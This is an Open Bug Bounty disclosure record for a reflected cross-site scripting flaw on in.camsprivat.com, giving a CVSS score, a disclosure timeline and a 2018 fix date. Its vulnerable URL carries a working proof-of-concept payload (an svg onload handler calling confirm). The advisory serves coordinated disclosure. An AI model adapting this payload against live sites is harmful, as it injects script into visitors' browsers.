Lucene search

K
openbugbountyLogin_deniedOBB:456987
HistoryDec 21, 2017 - 10:24 p.m.

in.camsprivat.com XSS vulnerability

2017-12-2122:24:00
login_denied
www.openbugbounty.org
10
Open Bug Bounty ID: OBB-456987
Description Value
Affected Website: in.camsprivat.com
Vulnerable Application: Custom Code
Vulnerability Type: XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score: 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide: OWASP XSS Prevention Cheat Sheet
Vulnerable URL:
http://in.camsprivat.com/?c=%22%3E%3C/script%3E%3Csvg/onload=confirm(/OPENBUGBOUNTY/)%3E
Coordinated Disclosure Timeline
Description Value
Vulnerability Reported: 21 December, 2017 22:24 GMT
Vulnerability Verified: 21 December, 2017 22:26 GMT
Website Operator Notified: 21 December, 2017 22:26 GMT
Vulnerability Published: 21 December, 2017 22:26 GMT[without any technical details]
Vulnerability Fixed: 1 February, 2018 13:34 GMT
Public Disclosure: 1 February, 2018 13:34 GMT